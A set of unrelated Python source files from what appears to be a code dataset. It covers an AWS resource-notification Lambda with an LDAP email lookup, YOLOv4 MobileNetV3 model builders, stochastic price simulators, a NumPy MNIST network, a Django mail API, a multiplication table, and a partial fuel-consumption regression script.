    messages.append("""Your Resources: </br><pre style="margin-left: 40px">""" + application + "</br></pre>" + action + """ in AWS. <strong style="font-family: 'Helvetica Neue',Helvetica,Arial,sans-serif; box-sizing: border-box; font-size: 14px; margin: 0;">""" + remedy +"""</strong>
</td>
</tr><tr style="font-family: 'Helvetica Neue',Helvetica,Arial,sans-serif; box-sizing: border-box; font-size: 14px; margin: 0;"><td class="content-block" style="font-family: 'Helvetica Neue',Helvetica,Arial,sans-serif; box-sizing: border-box; font-size: 14px; vertical-align: top; margin: 0; padding: 0 0 20px;" valign="top">
This message was sent to inform you of changes happening to your resources.
<ul>
<li>New instances are auto-tagged with an expiration date, an NT ID, and a patch group if invalid.</li>
<li>Instances without the necessary tags are notified through email and Slack.</li>
</ul>
If you have any further questions, please reply to this email.""")
    messages.append("Your Resources:\n\n" + application + "\n\n" + action + " in AWS. " + remedy + "\n" +
                    ("\nThis message was sent to inform you of changes happening to your resources.\n"
                     "\nNew instances are auto-tagged with an expiration date, an NT ID, and a patch group if invalid."
                     "Instances without Owner Mail and Owner Team tags are notified through email and slack.\n"
                     "\nIf you have any further questions, please reply to this email."))
    return messages
def get_email(nt_id):
    """
    # Retrieves the email from an nt_id
    Looks the user up in Active Directory via the query_ldap lambda, binding
    with the service account stored in Secrets Manager.
    :param nt_id: the id to search through
    :return: email address or None if not found
    """
    secret = json.loads(get_secret())
    username = secret['account_name']
    pw = secret['password']
    data = {
        "domain": "corporate.t-mobile.com",
        "base_dname": "OU=Production,OU=Users,OU=Accounts,DC=Corporate,DC=T-Mobile,DC=com",
        "bind_dname": "CN=%s,OU=LDAPS,OU=Non-production,OU=Services,OU=Accounts,DC=corporate,DC=t-mobile,DC=com" % username,
        "password": pw,
        "obj_name": nt_id,
        "obj_class": "user",
        "attributes": ["mail"],
    }
    lambda_client = boto3.client('lambda')
    invoke_response = lambda_client.invoke(
        FunctionName= os.environ.get("query_ldap"),
        InvocationType= "RequestResponse",
        Payload= json.dumps(data)
    )
    if ("FunctionError" not in invoke_response):
        # Unwrap the LDAP search result and pull the first 'mail' attribute.
        data = ast.literal_eval(json.load(invoke_response['Payload'])['body'])
        print(data)
        return data[0][0][1]['mail'][0]
    return None
def notify(nt_id, application, action, remedy, subj, heading):
    """
    # notifies an owner through email and slack
    :param nt_id: owner id to send to
    :param application: the resource affected
    :param action: the thing happening to the resource
    :param remedy: steps taken to remedy
    :param subj: subject line of the email
    :param heading: heading line of the email
    :return: N/A
    """
    email = get_email(nt_id)
    lambda_client = boto3.client('lambda')
    # messages[0] is the HTML email body, messages[1] the plain-text form.
    messages = create_messages(application, action, remedy)
    print(email)
    email_data = {
        'sender_mail': SENDER_EMAIL,
        'email': email,
        'subj': subj,
        'heading': heading,
        'messages': messages,
        'region': os.environ.get("AWS_DEFAULT_REGION")
    }
    invoke_email_response = lambda_client.invoke(
        FunctionName= os.environ.get("formatted_email"),
        InvocationType= "RequestResponse",
        Payload= json.dumps(email_data)
    )
    err = checkError(invoke_email_response, "Error sending email!")
    if err:
        print(str(err))
    # Slack gets the plain-text message minus the trailing boilerplate lines.
    slack_data = {
        'application_url': APP_URL,
        'channel': CHANNEL,
        'message': messages[1].rsplit("\n",5)[0],
        'channel_id': CHANNEL_ID,
        'nt_ids': [nt_id]
    }
    invoke_slack_response = lambda_client.invoke(
        FunctionName= os.environ.get("slack_message"),
        InvocationType= "RequestResponse",
        Payload= json.dumps(slack_data)
    )
    err = checkError(invoke_slack_response, "Error sending slack message!")
    if err:
        print(str(err))
def get_secret():
    """
    # gets the secret from AWS secrets manager
    Fetches the Active Directory service-account credentials.
    :param N/A:
    :return: the secrets value (JSON string) or None if not found
    """
    secret_name = "Jido-Active-Directory-Service-Account"
    # Create a Secrets Manager client
    session = boto3.session.Session()
    client = session.client(
        service_name='secretsmanager',
        region_name= os.environ.get("AWS_DEFAULT_REGION")
    )
    try:
        get_secret_value_response = client.get_secret_value(
            SecretId= secret_name
        )
    except ClientError as e:
        print("Error getting secret key!: " + str(e))
        return None
    else:
        # Decrypts secret using the associated KMS CMK.
        if 'SecretString' in get_secret_value_response:
            return get_secret_value_response['SecretString']
        # Binary-only secrets are not supported here.
        return None
def checkError(invoke_response, message):
    """Check a lambda invoke response for a function error.

    :param invoke_response: response dict from lambda_client.invoke
    :param message: message to print when an error is present
    :return: a 500 status/body dict describing the error, or None if clean
    """
    if 'FunctionError' not in invoke_response:
        return None
    # The error detail lives in the streaming Payload body.
    payload = invoke_response['Payload'].read()
    print(message)
    print(payload)
    return {
        'statusCode': 500,
        'body': json.dumps(str(payload))
    }
987,163 | 8aead3bb437927f17c67cddc8975592cec94b093 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""YOLO_v4 MobileNetV3Large Model Defined in Keras."""
from tensorflow.keras.layers import ZeroPadding2D, UpSampling2D, Concatenate
from tensorflow.keras.models import Model
from common.backbones.mobilenet_v3 import MobileNetV3Large
#from yolo4.models.layers import compose, DarknetConv2D, DarknetConv2D_BN_Leaky, Spp_Conv2D_BN_Leaky, Depthwise_Separable_Conv2D_BN_Leaky, Darknet_Depthwise_Separable_Conv2D_BN_Leaky, make_yolo_head, make_yolo_spp_head, make_yolo_depthwise_separable_head, make_yolo_spp_depthwise_separable_head
from yolo4.models.layers import yolo4_predictions, yolo4lite_predictions, tiny_yolo4_predictions, tiny_yolo4lite_predictions
def yolo4_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0):
    """Create YOLO_V4 MobileNetV3Large model CNN body in Keras."""
    backbone = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
    print('backbone layers number: {}'.format(len(backbone.layers)))

    # Feature maps for a 416x416 input. Layer indices are used because
    # activation layer names differ between TF1.x and TF2.x:
    #   layer 194: 13 x 13 x (960*alpha)  -- final feature map
    #   layer 146: 26 x 26 x (672*alpha)  -- middle of block12
    #   layer  79: 52 x 52 x (240*alpha)  -- middle of block6
    f1 = backbone.layers[194].output
    f2 = backbone.layers[146].output
    f3 = backbone.layers[79].output

    channel_nums = tuple(int(c * alpha) for c in (960, 672, 240))

    y1, y2, y3 = yolo4_predictions((f1, f2, f3), channel_nums, num_anchors, num_classes)
    return Model(inputs, [y1, y2, y3])
def yolo4lite_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0):
    '''Create YOLO_v4 Lite MobileNetV3Large model CNN body in keras.'''
    backbone = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
    print('backbone layers number: {}'.format(len(backbone.layers)))

    # Feature maps for a 416x416 input (indices avoid the TF1.x/TF2.x
    # activation-name difference):
    #   layer 194: 13x13x(960*alpha), layer 146: 26x26x(672*alpha),
    #   layer  79: 52x52x(240*alpha)
    f1 = backbone.layers[194].output
    f2 = backbone.layers[146].output
    f3 = backbone.layers[79].output

    channel_nums = tuple(int(c * alpha) for c in (960, 672, 240))

    y1, y2, y3 = yolo4lite_predictions((f1, f2, f3), channel_nums, num_anchors, num_classes)
    return Model(inputs, [y1, y2, y3])
def tiny_yolo4_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0, use_spp=True):
    '''Create Tiny YOLO_v4 MobileNetV3Large model CNN body in keras.'''
    backbone = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
    print('backbone layers number: {}'.format(len(backbone.layers)))

    # Two feature maps feed the tiny head (indices avoid TF1.x/TF2.x
    # activation-name differences):
    #   layer 194: 13x13x(960*alpha), layer 146: 26x26x(672*alpha)
    f1 = backbone.layers[194].output
    f2 = backbone.layers[146].output

    head_channels = (int(960 * alpha), int(672 * alpha))

    y1, y2 = tiny_yolo4_predictions((f1, f2), head_channels, num_anchors, num_classes, use_spp)
    return Model(inputs, [y1, y2])
def tiny_yolo4lite_mobilenetv3large_body(inputs, num_anchors, num_classes, alpha=1.0, use_spp=True):
    '''Create Tiny YOLO_v4 Lite MobileNetV3Large model CNN body in keras.'''
    backbone = MobileNetV3Large(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
    print('backbone layers number: {}'.format(len(backbone.layers)))

    # Two feature maps feed the tiny lite head (indices avoid TF1.x/TF2.x
    # activation-name differences):
    #   layer 194: 13x13x(960*alpha), layer 146: 26x26x(672*alpha)
    f1 = backbone.layers[194].output
    f2 = backbone.layers[146].output

    head_channels = (int(960 * alpha), int(672 * alpha))

    y1, y2 = tiny_yolo4lite_predictions((f1, f2), head_channels, num_anchors, num_classes, use_spp)
    return Model(inputs, [y1, y2])
|
987,164 | da5287436bcbb03a845e120c3d1a762c3cce9a86 | # Copyright 2020 The iqt Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import random
import numpy as np
import pandas as pd
import scipy as sp
from iqt.stochastic.processes.gbm import geometric_brownian_motion_log_returns
from iqt.stochastic.utils import ModelParameters, generate, convert_to_prices
# =============================================================================
# Merton Jump Diffusion Stochastic Process
# =============================================================================
def jump_diffusion_process(params: 'ModelParameters') -> 'np.array':
    """Produce the jump-size component of a Merton jump diffusion process.

    These jumps are combined with a geometric brownian motion (log returns)
    to produce the Merton model.

    Parameters
    ----------
    params : ModelParameters
        The parameters for the stochastic model.

    Returns
    -------
    `np.array`
        The jump sizes for each point in time (mostly zeroes if jumps are
        infrequent).
    """
    jump_sizes = [0.0] * params.all_time
    # Jump arrival times are exponentially distributed with rate `lamda`,
    # sampled by inverse transform of a uniform draw.
    neg_inv_rate = -(1.0 / params.lamda)
    arrival = 0
    elapsed = 0
    while arrival < params.all_time:
        arrival += neg_inv_rate * np.log(np.random.uniform(0, 1))
        # Credit the jump to the first time bucket containing the arrival.
        for j in range(params.all_time):
            if elapsed * params.all_delta <= arrival * params.all_delta <= (j + 1) * params.all_delta:
                jump_sizes[j] += random.normalvariate(params.jumps_mu, params.jumps_sigma)
                break
        elapsed += 1
    return jump_sizes
def geometric_brownian_motion_jump_diffusion_log_returns(params: 'ModelParameters') -> 'np.array':
    """Combine GBM log returns with a jump diffusion process.

    Parameters
    ----------
    params : ModelParameters
        The parameters for the stochastic model.

    Returns
    -------
    `np.array`
        A GBM process with jumps in it
    """
    # Element-wise sum of the two component processes (jumps drawn first).
    return np.add(
        jump_diffusion_process(params),
        geometric_brownian_motion_log_returns(params),
    )
def geometric_brownian_motion_jump_diffusion_levels(params: 'ModelParameters') -> 'np.array':
    """Convert GBM-with-jumps log returns into a price series.

    The resulting series evolves as a geometric brownian motion but can
    contain jumps at any point in time.

    Parameters
    ----------
    params : ModelParameters
        The parameters for the stochastic model.

    Returns
    -------
    `np.array`
        The price levels.
    """
    log_returns = geometric_brownian_motion_jump_diffusion_log_returns(params)
    return convert_to_prices(params, log_returns)
# =============================================================================
# Heston Stochastic Volatility Process
# =============================================================================
def cox_ingersoll_ross_heston(params: 'ModelParameters') -> 'np.array':
    """Construct the rate levels of a mean-reverting Cox-Ingersoll-Ross process.

    Used to model interest rates as well as stochastic volatility in the
    Heston model. Because the underlying and the stochastic volatility
    should have correlated returns, the brownian increments generated here
    are returned alongside the levels so a correlated path can be built
    from them.

    Parameters
    ----------
    params : ModelParameters
        The parameters for the stochastic model.

    Returns
    -------
    tuple of `np.array`
        (brownian increments, CIR rate/volatility levels)
    """
    # Sigma is folded into the increment scale here (heston does not reapply it).
    scale = np.sqrt(params.all_delta) * params.all_sigma
    increments = np.random.normal(loc=0, scale=scale, size=params.all_time)

    a, mu, start = params.heston_a, params.heston_mu, params.heston_vol0
    levels = [start]
    for i in range(1, params.all_time):
        prev = levels[i - 1]
        # Mean reversion toward mu plus sqrt-level-scaled randomness.
        levels.append(prev + a * (mu - prev) * params.all_delta
                      + np.sqrt(prev) * increments[i - 1])
    return np.array(increments), np.array(levels)
def heston_construct_correlated_path(params: 'ModelParameters',
                                     brownian_motion_one: 'np.array') -> 'np.array':
    """Build a second brownian path correlated with a given one.

    A simplified, two-asset version of the Cholesky decomposition method;
    it avoids matrix algebra entirely.

    Parameters
    ----------
    params : ModelParameters
        The parameters for the stochastic model.
    brownian_motion_one : `np.array`
        The reference brownian increments to correlate against.

    Returns
    -------
    tuple of `np.array`
        (the reference path, the correlated path)
    """
    # Sigma is deliberately not applied here; the Heston model does that.
    sqrt_delta = np.sqrt(params.all_delta)
    rho = params.cir_rho
    orthogonal_weight = np.sqrt(1 - pow(rho, 2))
    correlated = [
        rho * brownian_motion_one[i]
        + orthogonal_weight * random.normalvariate(0, sqrt_delta)
        for i in range(params.all_time - 1)
    ]
    return np.array(brownian_motion_one), np.array(correlated)
def heston_model_levels(params: 'ModelParameters') -> 'np.array':
    """Generate price levels corresponding to the Heston model.

    The Heston model is geometric brownian motion with stochastic
    volatility, where the volatility follows a Cox-Ingersoll-Ross process.
    Two correlated brownian paths are built: one drives the CIR volatility,
    the other drives the underlying asset.

    Parameters
    ----------
    params : ModelParameters
        The parameters for the stochastic model.

    Returns
    -------
    tuple of `np.array`
        (underlying price levels, CIR volatility levels)

    Warnings
    --------
    This method is dodgy! Need to debug!
    """
    brownian, cir_process = cox_ingersoll_ross_heston(params)
    brownian, brownian_motion_market = heston_construct_correlated_path(params, brownian)

    prices = [params.all_s0]
    for i in range(1, params.all_time):
        prev = prices[i - 1]
        drift = params.gbm_mu * prev * params.all_delta
        vol = cir_process[i - 1] * prev * brownian_motion_market[i - 1]
        prices.append(prev + drift + vol)
    return np.array(prices), np.array(cir_process)
def get_correlated_geometric_brownian_motions(params: 'ModelParameters',
                                              correlation_matrix: 'np.array',
                                              n: int) -> 'np.array':
    """Constructs a basket of correlated asset paths using the Cholesky
    decomposition method.

    Parameters
    ----------
    params : `ModelParameters`
        The parameters for the stochastic model.
    correlation_matrix : `np.array`
        An n x n correlation matrix.
    n : int
        Number of assets (number of paths to return)

    Returns
    -------
    `np.array`
        n correlated log return geometric brownian motion processes.
    """
    # Upper-triangular Cholesky factor; right-multiplying the uncorrelated
    # draws by it imposes the requested correlation structure.
    decomposition = sp.linalg.cholesky(correlation_matrix, lower=False)
    uncorrelated_paths = []
    sqrt_delta_sigma = np.sqrt(params.all_delta) * params.all_sigma
    # Construct uncorrelated paths to convert into correlated paths
    # (one row per time step, one column per asset).
    for i in range(params.all_time):
        uncorrelated_random_numbers = []
        for j in range(n):
            uncorrelated_random_numbers.append(random.normalvariate(0, sqrt_delta_sigma))
        uncorrelated_paths.append(np.array(uncorrelated_random_numbers))
    # NOTE(review): np.asmatrix/np.matrix is deprecated in modern NumPy;
    # if this module is upgraded, prefer plain ndarrays with `@`.
    uncorrelated_matrix = np.asmatrix(uncorrelated_paths)
    correlated_matrix = uncorrelated_matrix * decomposition
    assert isinstance(correlated_matrix, np.matrix)
    # The rest of this method just extracts paths from the matrix
    extracted_paths = []
    for i in range(1, n + 1):
        extracted_paths.append([])
    # Walk the (all_time x n) matrix in row-major flat-index order, peeling
    # one value per asset out of each row. len(correlated_matrix) is the
    # number of rows (all_time).
    # NOTE(review): the range upper bound (rows*n - n) appears to drop the
    # final time step from every extracted path — confirm this is intended.
    for j in range(0, len(correlated_matrix) * n - n, n):
        for i in range(n):
            extracted_paths[i].append(correlated_matrix.item(j + i))
    return extracted_paths
def heston(base_price: int = 1,
           base_volume: int = 1,
           start_date: str = '2010-01-01',
           start_date_format: str = '%Y-%m-%d',
           times_to_generate: int = 1000,
           time_frame: str = '1h',
           params: 'ModelParameters' = None) -> 'pd.DataFrame':
    """Generates price data from the Heston model.

    Parameters
    ----------
    base_price : int, default 1
        The base price to use for price generation.
    base_volume : int, default 1
        The base volume to use for volume generation.
    start_date : str, default '2010-01-01'
        The start date of the generated data
    start_date_format : str, default '%Y-%m-%d'
        The format for the start date of the generated data.
    times_to_generate : int, default 1000
        The number of bars to make.
    time_frame : str, default '1h'
        The time frame.
    params : `ModelParameters`, optional
        The model parameters.

    Returns
    -------
    `pd.DataFrame`
        The generated data frame containing the OHLCV bars.
    """
    # Only the price levels (element 0) of the Heston output are needed;
    # the CIR volatility series is discarded by the price_fn wrapper.
    return generate(
        price_fn=lambda p: heston_model_levels(p)[0],
        base_price=base_price,
        base_volume=base_volume,
        start_date=start_date,
        start_date_format=start_date_format,
        times_to_generate=times_to_generate,
        time_frame=time_frame,
        params=params,
    )
|
987,165 | 95d7c91bd5cddee6fe2c0a0a6773e4faee77ab39 | import numpy as np
import numpy as np
from numpy import linalg
import matplotlib
import matplotlib.pyplot as plt
from libsvm.svmutil import svm_read_problem
from sklearn.model_selection import train_test_split
def oneHot(array, num_classes=10):
    """One-hot encode a 1-D sequence of class labels.

    Generalized from the original hard-coded width of 10 (MNIST digits);
    existing callers are unchanged because 10 remains the default.

    Parameters:
        array: sequence of (possibly float) class labels in [0, num_classes);
            float labels are truncated to int, matching the old behavior.
        num_classes: width of the encoding (default 10).

    Returns:
        (len(array), num_classes) float ndarray with a single 1.0 per row.
    """
    labels = np.asarray(array, dtype=int)
    result = np.zeros((len(labels), num_classes))
    # Vectorized scatter: one fancy-indexed write instead of a Python loop.
    result[np.arange(len(labels)), labels] = 1
    return result
def softmax(Z):
    """Numerically stable column-wise softmax.

    Returns (A, cache) where cache is the max-shifted input used by the
    backward pass.
    """
    # Shifting each column by its max prevents overflow in exp.
    shifted = Z - np.max(Z, axis=0)
    exps = np.exp(shifted)
    A = exps / np.sum(exps, axis=0)
    return A, shifted
def relu(Z):
    """Element-wise rectified linear unit; returns (A, cache=Z)."""
    A = np.where(Z > 0, Z, 0)
    assert (A.shape == Z.shape)
    return A, Z
def initialize_parameters(n_x, n_h, n_y):
    """Seeded small-random weight / zero-bias init for a two-layer net.

    Returns {"W1": (n_h, n_x), "b1": (n_h, 1), "W2": (n_y, n_h), "b2": (n_y, 1)}.
    """
    np.random.seed(1)  # fixed seed keeps runs reproducible
    # Dict-literal order matters: W1 is drawn before W2 from the seeded RNG.
    parameters = {
        "W1": np.random.randn(n_h, n_x) * 0.01,
        "b1": np.zeros((n_h, 1)),
        "W2": np.random.randn(n_y, n_h) * 0.01,
        "b2": np.zeros((n_y, 1)),
    }
    return parameters
def linear_forward(A, W, b):
    """Affine transform Z = W.A + b; returns (Z, (A, W, b) cache)."""
    Z = W @ A + b
    assert (Z.shape == (W.shape[0], A.shape[1]))
    return Z, (A, W, b)
def linear_activation_forward(A_prev, W, b, activation):
    """Affine step followed by the named activation ('softmax' or 'relu').

    Returns (A, ((A_prev, W, b), activation_cache)).
    """
    Z, linear_cache = linear_forward(A_prev, W, b)
    if activation == "softmax":
        A, activation_cache = softmax(Z)
    elif activation == "relu":
        A, activation_cache = relu(Z)
    assert (A.shape == (W.shape[0], A_prev.shape[1]))
    return A, (linear_cache, activation_cache)
def compute_cost(AL, Y):
    """Cross-entropy cost of predictions AL against one-hot labels Y,
    averaged over the m examples (columns) in the batch."""
    m = Y.shape[1]
    cost = -np.sum(Y * np.log(AL)) / float(m)
    assert (cost.shape == ())
    return cost
def linear_backward(dZ, cache):
    """Backprop through Z = W.A_prev + b given dZ and the forward cache."""
    A_prev, W, b = cache
    m = float(A_prev.shape[1])
    dW = (dZ @ A_prev.T) / m
    db = np.sum(dZ, axis=1, keepdims=True) / m
    dA_prev = W.T @ dZ
    assert (dA_prev.shape == A_prev.shape)
    assert (dW.shape == W.shape)
    assert (db.shape == b.shape)
    return dA_prev, dW, db
def relu_backward(dA, cache):
    """Gradient of ReLU: pass dA through where the pre-activation was > 0."""
    Z = cache
    dZ = np.where(Z > 0, dA, 0)
    assert (dZ.shape == Z.shape)
    return dZ
def softmax_backward(Y, cache):
    """Combined softmax + cross-entropy gradient: dZ = softmax(Z) - Y."""
    Z = cache
    exps = np.exp(Z)
    dZ = exps / np.sum(exps, axis=0) - Y
    assert (dZ.shape == Z.shape)
    return dZ
def linear_activation_backward(dA, cache, activation):
    """Backprop through one (linear, activation) layer pair.

    For 'softmax' the incoming `dA` is actually the label matrix Y, since
    softmax_backward computes the fused softmax+cross-entropy gradient.
    """
    linear_cache, activation_cache = cache
    if activation == "relu":
        dZ = relu_backward(dA, activation_cache)
    elif activation == "softmax":
        dZ = softmax_backward(dA, activation_cache)
    return linear_backward(dZ, linear_cache)
def update_parameters(parameters, grads, learning_rate):
    """One in-place gradient-descent step over every layer's W and b."""
    num_layers = len(parameters) // 2  # two entries (W, b) per layer
    for layer in range(1, num_layers + 1):
        # -= mutates the arrays in place, so outside references stay current.
        parameters["W%d" % layer] -= learning_rate * grads["dW%d" % layer]
        parameters["b%d" % layer] -= learning_rate * grads["db%d" % layer]
    return parameters
def two_layer_model(X, Y, layers_dims, learning_rate=0.1, num_iterations=3000, print_cost=False):
    """Train a two-layer (relu -> softmax) network with batch gradient descent.

    X: (n_x, m) inputs; Y: (n_y, m) one-hot labels; layers_dims: (n_x, n_h, n_y).
    Returns the learned parameters dict and plots the cost curve.
    NOTE(review): `print_cost` is currently unused; the cost is printed every
    50 iterations regardless.
    """
    np.random.seed(1)
    grads = {}
    costs = []  # to keep track of the cost
    m = X.shape[1]  # number of examples
    (n_x, n_h, n_y) = layers_dims
    # Initialize parameters dictionary, by calling one of the functions you'd previously implemented
    parameters = initialize_parameters(n_x, n_h, n_y)
    # Get W1, b1, W2 and b2 from the dictionary parameters.
    # (update_parameters mutates these arrays in place via -=, and they are
    # also re-fetched after each update below.)
    W1 = parameters["W1"]
    b1 = parameters["b1"]
    W2 = parameters["W2"]
    b2 = parameters["b2"]
    # Loop (gradient descent)
    for i in range(0, num_iterations):
        # Forward propagation: relu hidden layer, softmax output layer.
        A1, cache1 = linear_activation_forward(X, W1, b1, activation='relu')
        A2, cache2 = linear_activation_forward(A1, W2, b2, activation='softmax')
        # Compute cost
        cost = compute_cost(A2, Y)
        # Backward propagation (the softmax layer takes the labels Y directly,
        # since its backward pass fuses softmax with cross-entropy).
        dA1, dW2, db2 = linear_activation_backward(Y, cache2, activation='softmax')
        dA0, dW1, db1 = linear_activation_backward(dA1, cache1, activation='relu')
        grads['dW1'] = dW1
        grads['db1'] = db1
        grads['dW2'] = dW2
        grads['db2'] = db2
        # Update parameters.
        parameters = update_parameters(parameters, grads, learning_rate)
        W1 = parameters["W1"]
        b1 = parameters["b1"]
        W2 = parameters["W2"]
        b2 = parameters["b2"]
        # Print and record the cost every 50 iterations.
        if i % 50 == 0:
            print("Cost after iteration {}: {}".format(i, np.squeeze(cost)))
            costs.append(cost)
    # Plot the recorded cost curve (side effect: opens a matplotlib window).
    plt.plot(np.squeeze(costs))
    plt.ylabel('cost')
    plt.xlabel('iterations (per tens)')
    plt.title("Learning rate =" + str(learning_rate))
    plt.show()
    return parameters
def predict(X, y, parameters):
    """Run a forward pass, print accuracy against labels y, and return the
    predicted class index for each example (column) of X."""
    m = X.shape[1]
    W1, b1 = parameters["W1"], parameters["b1"]
    W2, b2 = parameters["W2"], parameters["b2"]

    hidden, _ = linear_activation_forward(X, W1, b1, activation='relu')
    probs, _ = linear_activation_forward(hidden, W2, b2, activation='softmax')
    predicted = np.argmax(probs, axis=0)

    correct_num = np.sum(predicted == y)
    print(m, ' test case predicted.', sep='')
    print(correct_num, ' are correct.', sep='')
    print("Accuracy = " + str(correct_num / float(m)), sep='')
    return predicted
# Load libsvm-format MNIST: y_raw = labels, x_raw = sparse {index: value} dicts.
y_raw, x_raw = svm_read_problem('mnist.scale')
y = np.array(y_raw)
# Densify into a (num_samples, 780) matrix; libsvm feature indices are 1-based.
x = np.zeros((len(y_raw), 780))
for i in range(len(y_raw)):
    line = x_raw[i]
    for k, v in line.items():
        x[i][k - 1] = v
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)
y_train = oneHot(y_train)
print('====== Binary (Digit 1 and 2) =======')
# Binary task: digit 1 keeps label 1, digit 2 is remapped to label 0,
# then both are one-hot encoded into 2 columns.
y_bin = np.concatenate((y[y==1],[0]*sum(y==2)))
temp = np.zeros((len(y_bin), 2))
for number in range(len(y_bin)):
    temp[number][int(y_bin[number])] = 1
y_bin = temp
x_bin = np.concatenate((x[y==1],x[y==2]))
x_train_bin, x_test_bin, y_train_bin, y_test_bin = train_test_split(x_bin, y_bin, test_size=0.3)
# NOTE(review): y_test_bin is one-hot here, but predict() compares argmax
# predictions against raw labels — the binary accuracy may be wrong; confirm.
parameters_bin = two_layer_model(x_train_bin.T, y_train_bin.T, (780, 100, 2), 0.1, 100, True)
prediction_bin = predict(x_test_bin.T, y_test_bin.T, parameters_bin)
print('====== Multi-class =======')
# Full 10-class model: 780 inputs, 100 hidden units, 10 outputs.
parameters = two_layer_model(x_train.T, y_train.T, (780, 100, 10), 0.1, 300, True)
prediction = predict(x_test.T, y_test.T, parameters)
|
987,166 | f934de4f888f78e3ac9e4e0511ae7e3dbcdf5e34 | # -*- coding: utf-8 -*-
import json
from restless.views import Endpoint
from restless.auth import BasicHttpAuthMixin, login_required
from django.template import Context as C
from django.template import Template as T
from mails.models import Application, Log, Template
from mails.mailserver import MailServer
def message(status, content):
    """Wrap an API result as a {status, content} payload dict."""
    return dict(status=status, content=content)
class MailsAPI(Endpoint, BasicHttpAuthMixin):
    """REST endpoint that renders a stored template and sends it by email.

    NOTE(review): this module uses Python 2 syntax (`except ValueError, e`,
    `unicode`) and will not run on Python 3 without porting.
    """

    @login_required
    def post(self, request):
        """Send a templated email.

        Expects a JSON body with: app (application name), template
        (template name), receiver (address), context (template variables).
        Returns a {status, content} dict via message().
        """
        try:
            data = json.loads(request.body)
        except ValueError, e:
            # Malformed JSON: report the parse error back to the caller.
            return message(False, unicode(e))
        app_label = data.get("app")
        applications = Application.objects.filter(name=app_label)
        if not applications:
            return message(False, "Application not found.")
        application = applications[0]
        template_label = data.get("template")
        templates = Template.objects.filter(name=template_label)
        if not templates:
            return message(False, "Template not found.")
        template = templates[0]
        sender = application.default_sender
        receiver = data.get("receiver")
        context = data.get("context")
        subject = template.subject
        # Render the stored template body with the request-supplied context.
        content = T(template.content).render(C(context))
        # Send through the SMTP settings stored on the application record.
        server = MailServer(
            application.host,
            application.port,
            application.username,
            application.password,
            application.use_ssl)
        server.sendmail(sender, receiver, subject, content)
        # Audit trail of every outbound message.
        Log.objects.create(
            application=application,
            sender=sender,
            receiver=receiver,
            subject=subject,
            content=content)
        # NOTE(review): "Messsage" typo is preserved — fixing it would change
        # the API response payload that clients may match on.
        return message(True, "Messsage sent.")
|
987,167 | 60c229c56f5c64efe436430208aa47f7bfacd061 | for 단 in range(1,10):
for 곱 in range(1,10):
print(단,"x",곱,"=",(단*곱))
# 알고리즘 순서도
# * 줄1 공백 4 별1 현재줄수*2 2-1
# *** 줄2 공백3 별3 현재줄수*2 4-1
# ***** 줄3 공백 2 별5 현재줄수*2 6-1
# ******* 줄4 공백1 별7 현재줄수*2 8-1
# ********* 줄5 공백0 별9 현재줄수*2 10-1
# 1씩증가 1씩 감소 2씩증가
# 최대줄수-현재줄수 현재줄수*2-1
# range(1,6) " "*(6-변수) "*"*(현재줄수*2-1) |
987,168 | ce92bdb41915dbbefc952fdc047e5c72132f20ca | """
Build an estimating model for vehicle fuel consumption
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import linear_model
from sklearn import svm
# Load the drive-cycle data: FC_L1 = fuel consumption, speed (m/s), acceleration.
car = pd.read_csv("C:\\...")
car.head()

df = car.loc[:, ['FC_L1', 'Veh_Speed.m.s.', 'Acceleration']]
df.columns = ['FC_L1', 'S', 'A']

# Polynomial speed/acceleration terms up to third order, plus all cross terms.
df['S2'] = df['S']**2
df['S3'] = df['S']**3
df['A2'] = df['A']**2
df['A3'] = df['A']**3
df['SA'] = df['S']*df['A']
df['S2A'] = df['S']**2*df['A']
df['S3A'] = df['S']**3*df['A']
df['SA2'] = df['S']*df['A']**2
df['S2A2'] = df['S']**2*df['A']**2
df['S3A2'] = df['S']**3*df['A']**2
df['SA3'] = df['S']*df['A']**3
df['S2A3'] = df['S']**2*df['A']**3
df['S3A3'] = df['S']**3*df['A']**3

# Model the acceleration and deceleration regimes separately.
df_acc = df.loc[df['A'] >= 0].reset_index(drop=True)
df_dec = df.loc[df['A'] < 0].reset_index(drop=True)

# Hold out the last rows of each regime as the test set.
ACC_TEST_ROWS = 109095
DEC_TEST_ROWS = 41051

df_acc_X_train = df_acc.drop('FC_L1', axis=1)[:-ACC_TEST_ROWS]
df_acc_X_test = df_acc.drop('FC_L1', axis=1)[-ACC_TEST_ROWS:]
df_acc_y_train = np.log(df_acc.FC_L1[:-ACC_TEST_ROWS])
df_acc_y_test = np.log(df_acc.FC_L1[-ACC_TEST_ROWS:])

# BUG FIX: the deceleration X split previously reused the acceleration row
# count (109095) while its y split used 41051, misaligning X with y.
df_dec_X_train = df_dec.drop('FC_L1', axis=1)[:-DEC_TEST_ROWS]
df_dec_X_test = df_dec.drop('FC_L1', axis=1)[-DEC_TEST_ROWS:]
df_dec_y_train = np.log(df_dec.FC_L1[:-DEC_TEST_ROWS])
df_dec_y_test = np.log(df_dec.FC_L1[-DEC_TEST_ROWS:])

# --- Linear regression on the acceleration regime ---
regr_acc = linear_model.LinearRegression()
regr_acc.fit(df_acc_X_train, df_acc_y_train)
# Coefficients
print('Coefficients: \n', regr_acc.coef_)
# Mean squared error
print("Mean squared error: %.2f"
      % np.mean((regr_acc.predict(df_acc_X_test) - df_acc_y_test) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f' % regr_acc.score(df_acc_X_test, df_acc_y_test))

# --- Support vector regression ---
# BUG FIX: cross_val_score was previously used before its import further down.
